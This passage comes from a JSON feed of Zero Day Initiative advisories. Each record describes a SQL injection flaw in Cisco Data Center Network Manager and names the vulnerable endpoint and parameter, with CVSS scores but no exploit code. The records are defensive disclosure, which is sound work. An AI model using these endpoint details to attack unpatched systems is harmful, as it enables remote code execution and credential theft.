"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-042", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-042/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/fcflowsStat endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getFlowStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-044", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-044/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getFlowStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getFlowStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-089", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-089/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:06", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DiscoveryWSService/DiscoveryWS service. When processing the item parameter to the deepDiscoverForSelectedLanMembers endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager checkDiscoveryEthSwCandidates4List SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-093", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-093/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:51", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of requests to the getSwitchsDataLength endpoint of the /DbInventoryWSService/DbInventoryWS service. When parsing the colFilterStr parameter in the getLanSwitchDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchsDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-115", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-115/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the combinedconfig endpoint. When parsing the serialNumber parameter in the getSwitchName method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-113", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-113/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:52", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the /rest/control/links endpoint. When parsing the destinationInterface parameter in the checkLinkUUID method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager checkLinkUUID SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-116", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-116/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getIslStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-077", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-077/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:22", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getPortGroupMember endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getPortGroupMember SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-066", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-066/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:03", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topology/switches/otv/feature service. When parsing the hostname parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDiscoveredDeviceCount hostname SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-098", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-098/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:31", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/switches service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitches SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-051", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-051/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the bulk endpoint. When parsing the fabTemplate parameter in the getConfigTemplateFileName method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getConfigTemplateFileName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-111", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-111/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/modules service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getModules SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-048", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-048/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:11", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbHealthWSService/DbHealthWS service. When parsing the sortType parameter of the getSensorDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-085", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-085/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/rpm/getjobs endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getRPMTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-029", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-029/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:11", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbHealthWSService/DbHealthWS service. When parsing the sortType parameter of the getAccountingList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-086", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-086/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/endports endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getEndPorts SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 